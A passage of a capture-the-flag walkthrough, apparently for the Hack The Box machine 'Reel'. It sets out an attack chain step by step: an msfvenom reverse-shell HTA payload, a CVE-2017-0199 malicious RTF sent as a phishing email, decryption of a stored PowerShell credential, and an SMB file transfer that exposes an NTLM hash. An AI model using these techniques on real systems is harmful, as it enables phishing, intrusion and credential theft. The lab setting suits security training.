+ | EHLO Invalid domain address.
+ | Help:
+ | 220 Mail Service ready
+ | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
+ | SIPOptions:
+ | 220 Mail Service ready
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | TerminalServerCookie:
+ | 220 Mail Service ready
+ |_ sequence of commands
+ | smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
+ |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 49159/tcp open msrpc Microsoft Windows RPC
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port25-TCP:V=7.91%I=7%D=1/12%Time=5FFDCB73%P=x86_64-pc-linux-gnu%r(NULL
+ SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
+ SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
+ SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
+ SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
+ SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
+ SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
+ SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
+ SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
+ SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
+ SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
+ SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
+ SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
+ SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
+ SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
+ SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
+ SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
+ SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
+ SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
+ SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
+ SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
+ SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
+ SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
+ SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
+ SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
+ SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
+ SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
+ SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
+ SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
+ SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
+ SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
+ SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
+ SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
+ SF:0commands\r\n");
+ Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -1s, deviation: 1s, median: -2s
+ | smb-os-discovery:
+ | OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
+ | OS CPE: cpe:/o:microsoft:windows_server_2012::-
+ | Computer name: REEL
+ | NetBIOS computer name: REEL\x00
+ | Domain name: HTB.LOCAL
+ | Forest name: HTB.LOCAL
+ | FQDN: REEL.HTB.LOCAL
+ |_ System time: 2021-01-12T16:19:31+00:00
+ | smb-security-mode:
+ | account_used: <****blank>
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-01-12T16:19:32
+ |_ start_date: 2021-01-12T16:10:40
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 206.48 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 so let's investigate it:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → ftp 10.10.10.77
+ Connected to 10.10.10.77.
+ 220 Microsoft FTP Service
+ Name (10.10.10.77:nothing): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 05-28-18 11:19PM <****DIR> documents
+ 226 Transfer complete.
+ ftp> cd documents
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 05-28-18 11:19PM 2047 AppLocker.docx
+ 05-28-18 01:01PM 124 readme.txt
+ 10-31-17 09:13PM 14581 Windows Event Forwarding.docx
+ 226 Transfer complete.
+ ftp> mget *
+ mget AppLocker.docx?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 9 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 2047 bytes received in 0.03 secs (63.6166 kB/s)
+ mget readme.txt?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 124 bytes received in 0.03 secs (3.6738 kB/s)
+ mget Windows Event Forwarding.docx?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 51 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 14581 bytes received in 0.07 secs (200.3977 kB/s)
+ ftp> ^C
+ ftp> exit
+ 221 Goodbye.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → l
+ total 32K
+ drwxr-xr-x 2 nothing nothing 4.0K Jan 12 17:29 .
+ drwxr-xr-x 3 nothing nothing 4.0K Jan 12 17:29 ..
+ -rw-r--r-- 1 nothing nothing 2.0K Jan 12 17:27 AppLocker.docx
+ -rw-r--r-- 1 nothing nothing 122 Jan 12 17:27 readme.txt
+ -rw-r--r-- 1 nothing nothing 15K Jan 12 17:27 'Windows Event Forwarding.docx'
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → cat readme.txt
+ please email me any rtf format procedures - I'll review and convert.
+
+ new format / converted documents will be saved here.%
+
+
+
+Let's use exiftool to check out the metadata of these files since readme didn't give us anything specific:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → exiftool AppLocker.docx
+ ExifTool Version Number : 12.13
+ File Name : AppLocker.docx
+ Directory : .
+ File Size : 2047 bytes
+ File Modification Date/Time : 2021:01:12 17:27:13+01:00
+ File Access Date/Time : 2021:01:12 17:27:13+01:00
+ File Inode Change Date/Time : 2021:01:12 17:29:40+01:00
+ File Permissions : rw-r--r--
+ File Type : DOCX
+ File Type Extension : docx
+ MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
+ Zip Required Version : 20
+ Zip Bit Flag : 0x0008
+ Zip Compression : Deflated
+ Zip Modify Date : 2018:05:29 00:19:50
+ Zip CRC : 0x3cdd8b4f
+ Zip Compressed Size : 166
+ Zip Uncompressed Size : 284
+ Zip File Name : _rels/.rels
+
+
+
+Not much in Applocker.docx, However in the last file we see a bit more useful infos:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → exiftool Windows\ Event\ Forwarding.docx
+ ExifTool Version Number : 12.13
+ File Name : Windows Event Forwarding.docx
+ Directory : .
+ File Size : 14 KiB
+ File Modification Date/Time : 2021:01:12 17:27:15+01:00
+ File Access Date/Time : 2021:01:12 17:31:26+01:00
+ File Inode Change Date/Time : 2021:01:12 17:29:48+01:00
+ File Permissions : rw-r--r--
+ File Type : DOCX
+ File Type Extension : docx
+ MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
+ Zip Required Version : 20
+ Zip Bit Flag : 0x0006
+ Zip Compression : Deflated
+ Zip Modify Date : 1980:01:01 00:00:00
+ Zip CRC : 0x82872409
+ Zip Compressed Size : 385
+ Zip Uncompressed Size : 1422
+ Zip File Name : [Content_Types].xml
+ Creator : nico@megabank.com
+ Revision Number : 4
+ Create Date : 2017:10:31 18:42:00Z
+ Modify Date : 2017:10:31 18:51:00Z
+ Template : Normal.dotm
+ Total Edit Time : 5 minutes
+ Pages : 2
+ Words : 299
+ Characters : 1709
+ Application : Microsoft Office Word
+ Doc Security : None
+ Lines : 14
+ Paragraphs : 4
+ Scale Crop : No
+ Heading Pairs : Title, 1
+ Titles Of Parts :
+ Company :
+ Links Up To Date : No
+ Characters With Spaces : 2004
+ Shared Doc : No
+ Hyperlinks Changed : No
+ App Version : 14.0000
+
+
+
+For instance, this time we get a few more informations such as the username **nico** at the domain name **megabank.com** so let's add it to our hosts file:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.77 megabank.com' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 megabank.com
+ PING megabank.com (10.10.10.77) 56(84) bytes of data.
+ 64 bytes from megabank.com (10.10.10.77): icmp_seq=1 ttl=127 time=450 ms
+
+ --- megabank.com ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 450.267/450.267/450.267/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
+ →
+
+
+
+So let's open up the docx document and see what's in it using libreoffice:
+
+
+
+However that's about it for ftp, now let's move on to that smtp port using telnet Which is where we need to send a malicious email which contains a malicious .rtf file as we got hinted to do earlier, to the nico user. We're going to use [CVE-2017-0199](https://www.exploit-db.com/exploits/41934) :
+
+First we generate the HTA file:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.9 LPORT=9001 -f hta-psh -o msfv.hta
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 324 bytes
+ Final size of hta-psh file: 7431 bytes
+ Saved as: msfv.hta
+
+ [term2]
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+
+Note that this msfv.hta file is going to trigger the reverse shell connection back to us on port **9001** so don't forget to have your netcat ready
+
+Then we generate the RTF file:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → git clone https://github.com/bhdresh/CVE-2017-0199
+ Cloning into 'CVE-2017-0199'...
+ remote: Enumerating objects: 298, done.
+ remote: Total 298 (delta 0), reused 0 (delta 0), pack-reused 298
+ Receiving objects: 100% (298/298), 288.09 KiB | 1.20 MiB/s, done.
+ Resolving deltas: 100% (102/102), done.
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → cd CVE-2017-0199
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
+ → python2 cve-2017-0199_toolkit.py -M gen -w nihilist.rtf -u http://10.10.16.9/msfv.hta -t rtf -x 0
+ Generating normal RTF payload.
+
+ Generated nihilist.rtf successfully
+
+
+
+Note the **-u** parameter which is going to be the URL from which the box is going to get the **msfv.hta** file from, and next step is to send the phishing email with the **sendEmail** utility:
+
+
+ [term1]
+ [ 10.10.16.9/23 ] [ /dev/pts/16 ] [~/HTB/Reel]
+ → ls -lash msfv.hta; sudo python3 -m http.server 80
+ 8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+
+ [term2]
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
+ → sendEmail -f nihilist@megabank.com -t nico@megabank.com -u "check the attached file" -m "very important mail" -a nihilist.rtf -s 10.129.179.102 -v
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Connecting to 10.129.179.102:25
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => My IP address is: 10.10.16.9
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 220 Mail Service ready
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: EHLO nowhere
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: MAIL FROM:<****nihilist@megabank.com>
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: RCPT TO: <****nico@megabank.com>
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: DATA
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 354 OK, send.
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending message body
+ Dec 26 19:08:30 nowhere sendEmail[885036]: Setting content-type: text/plain
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Sending the attachment [nihilist.rtf]
+ Dec 26 19:08:43 nowhere sendEmail[885036]: SUCCESS => Received: 250 Queued (12.220 seconds)
+ Dec 26 19:08:43 nowhere sendEmail[885036]: Email was sent successfully! From: <****nihilist@megabank.com> To: <****nico@megabank.com> Subject: [check the attached file] Attachment(s): [nihilist.rtf] Server: [10.129.179.102:25]
+
+Then we need to wait a few minutes for nico to fall for the phishing attempt, and we get a shell:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.16.9] from (UNKNOWN) [10.129.179.102] 51538
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ htb\nico
+
+
+
+And we got a reverse shell connection ! We are now logged in as the nico user, so let's see if we can get the user flag:
+
+
+ C:\Windows\system32>cd ../../
+ cd ../../
+
+ C:\>cd Users\
+ cd Users\
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users
+
+ 03/11/2017 23:09 DIR> .
+ 03/11/2017 23:09 DIR> ..
+ 25/10/2017 20:48 DIR> .NET v2.0
+ 25/10/2017 20:48 DIR> .NET v2.0 Classic
+ 01/11/2017 21:58 DIR> .NET v4.5
+ 01/11/2017 21:58 DIR> .NET v4.5 Classic
+ 16/02/2018 23:29 DIR> Administrator
+ 04/11/2017 23:05 DIR> brad
+ 30/10/2017 23:00 DIR> claire
+ 25/10/2017 20:48 DIR> Classic .NET AppPool
+ 03/11/2017 23:09 DIR> herman
+ 31/10/2017 22:27 DIR> julia
+ 26/12/2021 12:30 DIR> nico
+ 22/08/2013 15:39 DIR> Public
+ 28/10/2017 21:32 DIR> SSHD
+ 16/11/2017 22:35 DIR> tom
+ 0 File(s) 0 bytes
+ 16 Dir(s) 15,739,142,144 bytes free
+
+ C:\Users>cd nico
+ cd nico
+
+ C:\Users\nico>cd desktop
+ cd desktop
+
+ C:\Users\nico\Desktop>type user.txt
+ type user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now on nico's desktop we see the following:
+
+
+ C:\Users\nico\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\nico\Desktop
+
+ 28/05/2018 20:07 DIR> .
+ 28/05/2018 20:07 DIR> ..
+ 27/10/2017 23:59 1,468 cred.xml
+ 27/10/2017 23:40 32 user.txt
+ 2 File(s) 1,500 bytes
+ 2 Dir(s) 15,739,027,456 bytes free
+
+ C:\Users\nico\Desktop>type cred.xml
+ type cred.xml
+ <****Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <****Obj RefId="0"> <****TN RefId="0"> <****T>System.Management.Automation.PSCredential <****/T> <****T>System.Object <****/T> <****/TN> <****ToString>System.Management.Automation.PSCredential <****/ToString> <****Props> <****S N="UserName">HTB\Tom <****/S> <****SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692 <****/SS> <****/Props> <****/Obj> <****/Objs>
+
+Here we see an output of the **Export-CliXml** command, which is this **cred.xml** file, we can get the password of tom out of it:
+
+
+ C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
+ powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
+
+
+ UserName : Tom
+ Password : **1ts-mag1c!!!**
+ SecurePassword : System.Security.SecureString
+ Domain : HTB
+
+
+
+And we have tom's password! Now let's ssh as the tom user using his password:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → ssh tom@megabank.com
+ The authenticity of host 'megabank.com (10.129.179.102)' can't be established.
+ ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'megabank.com' (ED25519) to the list of known hosts.
+ tom@megabank.com's password:
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ tom@REEL C:\Users\tom>whoami
+ htb\tom
+
+
+
+And we now have access to tom's system account! Let's take a look around:
+
+
+ tom@REEL C:\Users\tom>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom
+
+ 11/16/2017 10:35 PM DIR> .
+ 11/16/2017 10:35 PM DIR> ..
+ 10/27/2017 11:38 PM DIR> Contacts
+ 05/29/2018 07:57 PM DIR> Desktop
+ 10/27/2017 11:38 PM DIR> Documents
+ 10/29/2017 09:08 PM DIR> Downloads
+ 10/27/2017 11:38 PM DIR> Favorites
+ 10/27/2017 11:38 PM DIR> Links
+ 10/27/2017 11:38 PM DIR> Music
+ 10/27/2017 11:38 PM DIR> Pictures
+ 10/27/2017 11:38 PM DIR> Saved Games
+ 10/27/2017 11:38 PM DIR> Searches
+ 10/27/2017 11:38 PM DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom>cd Desktop
+
+ tom@REEL C:\Users\tom\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop
+
+ 05/29/2018 07:57 PM DIR> .
+ 05/29/2018 07:57 PM DIR> ..
+ 05/29/2018 08:02 PM DIR> AD Audit
+ 0 File(s) 0 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop>cd "AD Audit"
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>
+ tom@REEL C:\Users\tom\Desktop\AD Audit>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit
+
+ 05/29/2018 08:02 PM DIR> .
+ 05/29/2018 08:02 PM DIR> ..
+ 05/29/2018 11:44 PM DIR> BloodHound
+ 05/29/2018 08:02 PM 182 note.txt
+ 1 File(s) 182 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
+ Findings:
+
+ Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
+
+ Maybe we should re-run Cypher query against other groups we've created.
+
+
+Here we are hinted that there has been an AD audit, let's see if we have access to interesting bloodhound files:
+
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>cd BloodHound
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
+
+ 05/29/2018 11:44 PM DIR> .
+ 05/29/2018 11:44 PM DIR> ..
+ 05/29/2018 07:57 PM DIR> Ingestors
+ 10/30/2017 10:15 PM 769,587 PowerView.ps1
+ 1 File(s) 769,587 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
+
+ 05/29/2018 07:57 PM DIR> .
+ 05/29/2018 07:57 PM DIR> ..
+ 11/16/2017 11:50 PM 112,225 acls.csv
+ 10/28/2017 08:50 PM 3,549 BloodHound.bin
+ 10/24/2017 03:27 PM 246,489 BloodHound_Old.ps1
+ 10/24/2017 03:27 PM 568,832 SharpHound.exe
+ 10/24/2017 03:27 PM 636,959 SharpHound.ps1
+ 5 File(s) 1,568,054 bytes
+ 2 Dir(s) 15,736,729,600 bytes free
+
+
+
+So let's transfer the bloodhound files back to our local machine:
+
+
+ [term 1]
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
+ → impacket-smbserver -smb2support nihilist .
+ Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
+
+ [*] Config file parsed
+ [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+ [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+ [*] Config file parsed
+ [*] Config file parsed
+ [*] Config file parsed
+
+ [term 2]
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>copy * \\10.10.16.9\nihilist\
+ acls.csv
+ BloodHound.bin
+ BloodHound_Old.ps1
+ SharpHound.exe
+ SharpHound.ps1
+ 5 file(s) copied.
+
+ [term 1]
+ [*] Incoming connection (10.129.179.102,61795)
+ [*] AUTHENTICATE_MESSAGE (HTB\tom,REEL)
+ [*] User REEL\tom authenticated successfully
+ [*] tom::HTB:aaaaaaaaaaaaaaaa:97ed7e26f0ec5b28ae6cb130414917ed:0101000000000000809d2c0658fbd70124aa28f4ea690e2f00000000010010007700660056004200780073004100710003001000770066005600420078007300410071000200100043007700570048007300450056005300040010004300770057004800730045005600530007000800809d2c0658fbd701060004000200000008003000300000000000000000000000003000005085ea7922d5329d13836e2e2a7350eacf7ee793c7c9205c7ad5e64f5183febb0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
+ [*] Connecting Share(1:IPC$)
+ [*] Connecting Share(2:nihilist)
+
+ ^C
+
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
+ → ls -lash
+ total 1.6M
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 20:29 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 25 21:26 ..
+ 112K -rwxr-xr-x 1 nothing nothing 110K May 29 2018 acls.csv
+ 4.0K -rwxr-xr-x 1 nothing nothing 3.5K Oct 29 2017 BloodHound.bin
+ 244K -rwxr-xr-x 1 nothing nothing 241K Oct 29 2017 BloodHound_Old.ps1
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Dec 26 19:00 CVE-2017-0199
+ 8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
+ 556K -rwxr-xr-x 1 nothing nothing 556K Oct 29 2017 SharpHound.exe
+ 624K -rwxr-xr-x 1 nothing nothing 623K Oct 29 2017 SharpHound.ps1
+
+
+
+Now that we have transfered the files back to our machine, let's inspect them using bloodhound:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
+ → sudo apt install neo4j
+
+ [ 10.10.16.9/23 ] [ /dev/pts/15 ] [~/Tools]
+ → sudo neo4j console
+ Directories in use:
+ home: /usr/share/neo4j
+ config: /usr/share/neo4j/conf
+ logs: /usr/share/neo4j/logs
+ plugins: /usr/share/neo4j/plugins
+ import: /usr/share/neo4j/import
+ data: /usr/share/neo4j/data
+ certificates: /usr/share/neo4j/certificates
+ licenses: /usr/share/neo4j/licenses
+ run: /usr/share/neo4j/run
+ Starting Neo4j.
+ 2021-12-27 20:10:00.054+0000 INFO Starting...
+ 2021-12-27 20:10:00.455+0000 INFO This instance is ServerId{39ac0325} (39ac0325-ca50-4041-ba6d-444c78dc4026)
+ 2021-12-27 20:10:02.130+0000 INFO ======== Neo4j 4.4.2 ========
+ 2021-12-27 20:10:03.469+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
+ 2021-12-27 20:10:03.473+0000 INFO Setting up initial user from defaults: neo4j
+ 2021-12-27 20:10:03.474+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
+ 2021-12-27 20:10:03.481+0000 INFO Setting version for 'security-users' to 3
+ 2021-12-27 20:10:03.483+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
+ 2021-12-27 20:10:03.488+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
+ 2021-12-27 20:10:03.700+0000 INFO Bolt enabled on localhost:7687.
+ 2021-12-27 20:10:04.423+0000 INFO Remote interface available at http://localhost:7474/
+ 2021-12-27 20:10:04.428+0000 INFO id: AC467907227285E4E491280BBC436619BBDF6A413FD78BD3F4BCB8455310E603
+ 2021-12-27 20:10:04.428+0000 INFO name: system
+ 2021-12-27 20:10:04.428+0000 INFO creationDate: 2021-12-27T20:10:02.593Z
+ 2021-12-27 20:10:04.428+0000 INFO Started.
+
+
+
+
+Then goto **http://127.0.0.1:7474** and login with credentials **neo4j:neo4j**
+
+
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.3/BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → mkdir Bloodhound
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → mv BloodHound-linux-x64.zip Bloodhound/
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools]
+ → cd Bloodhound
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → unzip BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → ls -l
+ total 100032
+ drwxrwxr-x 5 nothing nothing 4096 Jul 15 20:13 BloodHound-linux-x64
+ -rw-r--r-- 1 nothing nothing 102425633 Dec 8 05:47 BloodHound-linux-x64.zip
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [~/Tools/Bloodhound]
+ → cd BloodHound-linux-x64
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
+ → ls -l
+ total 175752
+ -rwxr-xr-x 1 nothing nothing 127561112 Jul 15 20:13 BloodHound
+ -rw-r--r-- 1 nothing nothing 179981 Jul 15 20:13 chrome_100_percent.pak
+ -rw-r--r-- 1 nothing nothing 321151 Jul 15 20:13 chrome_200_percent.pak
